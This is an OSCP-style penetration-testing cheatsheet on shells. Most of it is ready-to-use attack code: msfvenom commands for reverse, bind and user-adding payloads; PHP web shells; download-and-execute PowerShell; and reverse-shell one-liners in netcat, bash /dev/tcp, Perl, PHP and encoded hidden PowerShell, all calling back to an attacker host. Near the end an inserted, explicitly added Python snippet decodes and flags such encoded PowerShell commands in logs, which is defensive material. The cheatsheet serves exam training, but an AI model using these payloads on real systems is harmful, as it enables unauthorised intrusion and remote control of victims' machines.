OSCP Cheatsheet

Shells


Last updated 9 days ago

Web Shells

Locate and upload the appropriate web shell from /usr/share/webshells


Reverse Shells

Refer to


Reverse Shells (MSFvenom)

NOTE:

  • shell/reverse_tcp = staged payload

  • shell_reverse_tcp = unstaged payload

  • a staged payload requires a Metasploit multi/handler listener; a plain netcat listener only works with the unstaged payload

Linux

Reverse Shell
  • 32-bit Systems

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf > shell-x86.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf > shell-x86.elf
  • 64-bit Systems

msfvenom -p linux/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf > shell-x64.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf > shell-x64.elf
Bind Shell
  • 32-bit Systems

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf
msfvenom -p linux/x86/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf
msfvenom -p linux/x86/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf
  • 64-bit Systems

msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf
msfvenom -p linux/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf
msfvenom -p linux/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf

Windows

Reverse Shell
  • 32-bit Systems

msfvenom -p windows/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f exe > shell-x86.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f exe > shell-x86.exe
  • 64-bit Systems

msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f exe > shell-x64.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f exe > shell-x64.exe
Bind Shell
  • 32-bit Systems

msfvenom -p windows/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe
msfvenom -p windows/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe
msfvenom -p windows/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe
msfvenom -p windows/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe
  • 64-bit Systems

msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe
msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe
msfvenom -p windows/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe
msfvenom -p windows/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe
Extras
  • Run command via executable file

msfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="<Powershell | CMD Command>" -f exe > payload.exe

EXAMPLE:

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).DownloadString('http:///')\"" -f exe > payload.exe

  • Create User via executable file

msfvenom -p windows/adduser USER=<Username> PASS=<Password> -f exe > adduser.exe

SunOS (Solaris)

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf

Web-based Payloads

PHP

Web Shell
<?php system($_GET['cmd']); ?>
<?php system($_REQUEST['cmd']); ?>
Reverse Shell
<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP[X]

Web Shell

Get from the following

  • /usr/share/webshells/aspx/cmdasp.aspx

  • /usr/share/webshells/aspx/shell.aspx

NOTE: Remember to edit the variables string host and int port in shell.aspx before uploading it

Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f aspx > reverse.aspx

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f war > reverse.war

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port>

Script Language Payloads

Evil-WinRM

NOTE:

  • Verify usability with: crackmapexec winrm <Target IP>

  • Look for port 5985 in nmap scans

evil-winrm -i <Target IP Address> -u <Username> -p <Password>
evil-winrm -i <Target IP Address> -u <Username> -H <NTLM Hash>

Powercat.ps1

powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP Address>/powercat.ps1')
powercat -c <Kali IP Address> -p <Kali Port> -e powershell

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.pl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP Address>:<Kali Port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.py

PHP

<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
php -r '$sock=fsockopen("<Kali IP Address>",<Kali Port>);exec("/bin/sh -i <&3 >&3 2>&3");'

Bash

NOTE: Create a .sh file and paste the following

#!/bin/bash
/bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1"

Netcat

  • Linux

nc -nv <Kali IP Address> <Kali Port> -e /bin/bash
nc -nv <Kali IP Address> <Kali Port> -e /bin/sh
nc -nv <Kali IP Address> <Kali Port> -c /bin/bash
nc -nv <Kali IP Address> <Kali Port> -c /bin/sh
  • Windows

nc64.exe <Kali IP Address> <Kali Port> -e cmd
nc64.exe <Kali IP Address> <Kali Port> -e powershell
nc64.exe <Kali IP Address> <Kali Port> -t -e cmd
nc64.exe <Kali IP Address> <Kali Port> -t -e powershell

PowerShell

Do the following in Kali's pwsh

$Text = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>", <Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

Create the following python script and run it

import base64

# PowerShell's -e / -EncodedCommand expects base64 of the UTF-16LE bytes of the
# command with no byte-order mark; 'utf-16le' produces exactly that, so no
# slicing of a BOM is needed (plain 'utf16' adds a BOM and is endian-dependent).
payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()

print(cmd)
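From the defender's side, the encoding above is what has to be undone when a "powershell -e <base64>" command line shows up in a process-creation log. This added example (not from the cheatsheet) decodes such a command line and flags the indicators used by the one-liner above; the sample command line is constructed inline from a truncated, non-functional fragment.

```python
import base64
import re
import shlex

# Constructed sample: the shape of the command line the script above produces, as
# it would appear in a process-creation event. The encoded text is a truncated
# fragment carrying the page's indicators, not a working payload.
SAMPLE_FRAGMENT = '$c=New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444);$s=$c.GetStream();iex $d'
SAMPLE_CMDLINE = "powershell -nop -w hidden -e " + base64.b64encode(SAMPLE_FRAGMENT.encode("utf-16le")).decode()

# Indicators drawn from the PowerShell one-liner on this page, each with a short label.
INDICATORS = {
    r"Net\.Sockets\.TCPClient": "outbound socket",
    r"\.GetStream\(\)": "raw stream I/O",
    r"\biex\b|Invoke-Expression": "dynamic code execution",
    r"DownloadString\(": "remote script download",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded text of a -e/-EncodedCommand argument, or None if there is none."""
    args = shlex.split(cmdline, posix=False)  # Windows-style command line; quotes are kept
    for i, arg in enumerate(args[:-1]):
        if ENC_FLAG.match(arg):
            b64 = args[i + 1]
            b64 += "=" * (-len(b64) % 4)  # some log pipelines strip base64 padding
            return base64.b64decode(b64).decode("utf-16le", errors="replace")
    return None


def triage(cmdline):
    """Return (decoded_text, [matched indicator labels]); (None, []) when nothing is encoded."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None, []
    hits = [label for pattern, label in INDICATORS.items() if re.search(pattern, decoded, re.IGNORECASE)]
    return decoded, hits


if __name__ == "__main__":
    text, hits = triage(SAMPLE_CMDLINE)
    print(text)
    print("indicators:", ", ".join(hits))
```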

TTY Shell

NOTE: Sometimes a reverse shell is not fully interactive (no job control, no tab completion, editors and sudo prompts misbehave). The following commands spawn a proper TTY shell.

Python

python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=xterm-256color; python3 -c 'import pty; pty.spawn("/bin/bash")'
import os; os.system('/bin/bash')

NOTE: Set TERM before spawning the pty so the new shell inherits it; the last line is for use from an interactive Python prompt.

Bash

/bin/sh -i
/bin/bash -i
script -qc /bin/bash /dev/null

Perl

perl -e 'exec "/bin/sh";'
exec "/bin/sh";

Ruby

exec "/bin/sh"

Lua

os.execute('/bin/sh')

IRB

exec "/bin/sh"

Vi

:!bash
:set shell=/bin/bash:shell

Nmap:

!sh
https://www.revshells.com/